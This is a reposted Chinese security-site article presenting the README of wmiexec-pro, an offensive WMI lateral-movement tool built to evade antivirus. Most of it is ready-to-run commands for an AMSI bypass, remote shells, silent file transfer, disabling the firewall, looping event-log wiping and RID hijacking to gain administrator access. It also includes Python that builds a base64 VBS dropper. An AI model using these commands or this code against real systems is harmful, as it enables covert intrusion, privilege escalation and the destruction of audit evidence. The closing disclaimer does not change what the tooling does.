[Tools of the Trade] wmiexec-pro: a new-generation wmiexec lateral-movement tool with AV evasion
Project introduction
A new generation of wmiexec.py with more features. The whole operation works over port 135 only (no SMB connection), for AV evasion (Windows Defender, Huorong, 360) during lateral movement. Note that "port 135 only" means no SMB/445 session is opened; DCOM still negotiates a dynamic RPC port through the endpoint mapper on 135, so that high port must also be reachable.
Project features
- Main goal: AV evasion
- Main feature: no need for Win32_Process
- Main feature: only port 135 is used (no SMB)
- New module: AMSI bypass
- New module: file transfer
- New module: enable RDP remotely via WMI class methods
- New module: Windows firewall abuse
- New module: looping event log cleaning
- New module: enable WinRM remotely without touching CMD
- New module: service manager
- New module: RID hijacking
- Enhancement: command-execution output is retrieved in a new way
- Enhancement: execute VBS files
Usage
python wmiexec-pro.py [[domain/]username[:password]@]<targetName or address> module -h
Basic enumeration:
python wmiexec-pro.py administrator:password@192.168.1.1 enum -run
Enable/disable AMSI bypass:
python wmiexec-pro.py administrator:password@192.168.1.1 amsi -enable
python wmiexec-pro.py administrator:password@192.168.1.1 amsi -disable
Execute command:
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -shell (Launch a semi-interactive shell)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" (Default is with-output mode)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent (Silent mode)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -silent -old (Silent mode on old OS versions, such as Server 2003)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old (With output on old OS versions, such as Server 2003)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -save (With output, and save the output to a file)
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -command "whoami" -old -save
python wmiexec-pro.py administrator:password@192.168.1.1 exec-command -clear (Remove the temporary class used for command-result storage)
File transfer:
python wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -upload -src-file "./" -dest-file "C:\windows\temp\" (Upload file over 512KB)
python wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -download -src-file "C:\windows\temp\" -dest-file "/tmp/" (Download file over 512KB)
python wmiexec-pro.py administrator:password@192.168.1.1 filetransfer -clear (Remove the temporary class used for file transfer)
RDP:
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable (Auto-configures the firewall)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable -old (For old OS versions, such as Server 2003)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -enable-ram (Enable Restricted Admin Mode for PTH; not supported on old OS versions, such as Server 2003)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable -old (For old OS versions, such as Server 2003)
python wmiexec-pro.py administrator:password@192.168.1.1 rdp -disable-ram (Disable Restricted Admin Mode)
WinRM (Windows 7+ only):
python wmiexec-pro.py administrator:password@192.168.1.1 winrm -enable
python wmiexec-pro.py administrator:password@192.168.1.1 winrm -disable
Firewall (Windows 8+ only):
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -search-port 445
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -dump (Dump all firewall rules)
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -rule-id (ID from search-port) -action [enable/disable/remove] (Enable, disable or remove the specified rule)
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile enable (Enable all firewall profiles)
python wmiexec-pro.py administrator:password@192.168.1.1 firewall -firewall-profile disable (Disable all firewall profiles)
Services:
python wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\'
python wmiexec-pro.py administrator:password@192.168.1.1 service -action create -service-name "test" -display-name "For test" -bin-path 'C:\windows\system32\' -class "Win32_TerminalService" (Create the service via an alternative class)
python wmiexec-pro.py administrator:password@192.168.1.1 service -action start -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action stop -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action disable -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action auto-start -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action manual-start -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action getinfo -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -action delete -service-name "test"
python wmiexec-pro.py administrator:password@192.168.1.1 service -dump all-services.json
Event log:
python wmiexec-pro.py administrator:password@192.168.1.1 eventlog -risk-i-know (Loop-clean the event log)
python wmiexec-pro.py administrator:password@192.168.1.1 eventlog -retrive object-ID (Stop loop-cleaning the event log)
RID hijack:
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant (Grant access permission on the SAM/SAM subkey in the registry)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action grant-old (For old OS versions, such as Server 2003)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action activate (Activate the user)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action deactivate (Deactivate the user)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 501 -action hijack -hijack-rid 500 (Hijack guest RID 501 to administrator RID 500)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login enable (Enable blank-password login)
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -blank-pass-login disable
python wmiexec-pro.py administrator:password@192.168.1.1 rid-hijack -user 500 -action backup (Saves the user's profile data as a JSON file)
python wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -user 500 -remove (Use the guest user to remove the administrator user profile after the RID hijack)
python wmiexec-pro.py guest@192.168.1.1 -no-pass rid-hijack -restore "backup.json" (Restore the profile of the target user)
Help output: (screenshot not included)
Command execution: (screenshot not included)
File transfer: (screenshot not included)
How it works
- AMSI module: the technique from Tal Liberman's Black Hat Asia 2018 talk.
- Exec-command module: an enhancement of the author's earlier project wmiexec-RegOut; the output is fetched from a WMI class instead of from the registry.
- File transfer module, upload: the source file is base64-encoded into a dropper named WriteFile.vbs, then a new ActiveScriptEventConsumer instance is created to execute that dropper.
- File transfer module, download: a class for storing the data is created remotely, then the encoder LocalFileIntoClass.vbs is executed to encode the file and store the data in the class just created.
- RDP module, enable/disable the RDP service: controls the TerminalServices object directly.
- RDP module, enable/disable Restricted Admin Mode: controls the DisableRestrictedAdmin registry value through the StdRegProv class.
- WinRM module, enable/disable: calls the service module.
- WinRM module, firewall rule: uses the firewall.py module to configure the firewall for WinRM.
- Firewall module: abuses the MSFT_NetProtocolPortFilter, MSFT_NetFirewallRule and MSFT_NetFirewallProfile classes.
- Service module: abuses the Win32_Service class.
- Event log module: executes the VBS script ClearEventlog.vbs without removing the event filter and consumer, so the clearing keeps looping until it is stopped.
- Execute-VBS module: taken from wmipersist.py.
- classMethodEx, class creation: executes the VBS script CreateClass.vbs to create a simple class. (Why? The author did not know how to use the PutClass method in impacket.)
- classMethodEx, class removal: calls the DeleteClass method to remove the class.
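The plumbing behind two of the items above, retrieving command output from a temporary WMI class and the base64/VBS file-transfer path, as an added Python example; this is not wmiexec-pro's own code. The chunk size, the Data0/Data1 property naming, the property layout of the storage class and the dropper body (MSXML bin.base64 decoding plus ADODB.Stream) are assumptions made for illustration, and the sample payload is constructed; the project's real WriteFile.vbs and storage class may differ.

```python
import base64
import re

# Constructed sample payload: stands in for a command's redirected output or a
# file to upload; long enough to span several chunks.
SAMPLE_OUTPUT = b"whoami\r\nnt authority\\system\r\n" * 200

CHUNK_SIZE = 4096          # assumed characters per string property
PROPERTY_PREFIX = "Data"   # assumed property naming: Data0, Data1, ...


def encode_to_chunks(data: bytes, chunk_size: int = CHUNK_SIZE) -> list:
    """Base64-encode the payload and cut the text into fixed-size pieces,
    one piece per string property of the temporary storage class."""
    b64 = base64.b64encode(data).decode("ascii")
    return [b64[i:i + chunk_size] for i in range(0, len(b64), chunk_size)]


def decode_from_chunks(chunks) -> bytes:
    """Concatenate the pieces in order and base64-decode them."""
    return base64.b64decode("".join(chunks), validate=True)


def to_class_properties(chunks, prefix: str = PROPERTY_PREFIX) -> dict:
    """Lay the chunks out as the property values written into the class."""
    return {f"{prefix}{i}": chunk for i, chunk in enumerate(chunks)}


def from_class_properties(props: dict, prefix: str = PROPERTY_PREFIX) -> bytes:
    """Rebuild the payload from a property dictionary as a WMI query would
    return it. Properties are ordered by their numeric suffix: a plain sorted()
    on names would put Data10 before Data2 and corrupt the base64 stream."""
    pattern = re.compile(rf"^{re.escape(prefix)}(\d+)$")
    indexed = []
    for name, value in props.items():
        m = pattern.match(name)
        if m and value is not None:
            indexed.append((int(m.group(1)), value))
    indexed.sort()
    if [i for i, _ in indexed] != list(range(len(indexed))):
        raise ValueError("missing or duplicate chunk index")
    return decode_from_chunks([v for _, v in indexed])


def build_dropper_vbs(data: bytes, dest_path: str) -> str:
    """Emit a WriteFile.vbs-style dropper: the base64 payload is embedded as
    string literals, decoded through an MSXML node of dataType bin.base64 and
    written to dest_path with ADODB.Stream (Type 1 = binary, SaveToFile 2 =
    overwrite). Assumed layout, not the project's own script."""
    safe_path = dest_path.replace('"', '""')       # VBS escapes quotes by doubling
    lines = ["Dim b64", 'b64 = ""']
    for piece in encode_to_chunks(data, 512):      # keep VBS lines short
        lines.append(f'b64 = b64 & "{piece}"')
    lines += [
        'Set xml = CreateObject("MSXML2.DOMDocument")',
        'Set node = xml.createElement("b64")',
        'node.dataType = "bin.base64"',
        "node.text = b64",
        'Set stream = CreateObject("ADODB.Stream")',
        "stream.Type = 1",
        "stream.Open",
        "stream.Write node.nodeTypedValue",
        f'stream.SaveToFile "{safe_path}", 2',
        "stream.Close",
    ]
    return "\r\n".join(lines) + "\r\n"


if __name__ == "__main__":
    chunks = encode_to_chunks(SAMPLE_OUTPUT, 100)
    props = to_class_properties(chunks)
    assert from_class_properties(props) == SAMPLE_OUTPUT
    print(f"{len(chunks)} chunks, round trip ok")
    print(build_dropper_vbs(b"hello", r"C:\windows\temp\demo.bin"))
```

The numeric ordering in from_class_properties is the practical gotcha: once the output is spread over more than ten properties, reading them back in name order silently corrupts the base64 stream. The generated dropper only does anything when executed on the target (for example by an ActiveScriptEventConsumer, as described above); generating it locally is harmless.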
Disclaimer
For technical research and formally authorised offensive/defensive engagements only. Users must comply with the Cybersecurity Law of the People's Republic of China and must not use this for any illegal activity. Anyone who uses the tool for other purposes bears full legal and joint liability; the author and publisher accept no legal liability.
This article was shared under the Tencent Cloud self-media syndication programme. Originally published 2025-01-07.
Uploaded: 2025-07-22 21:21:42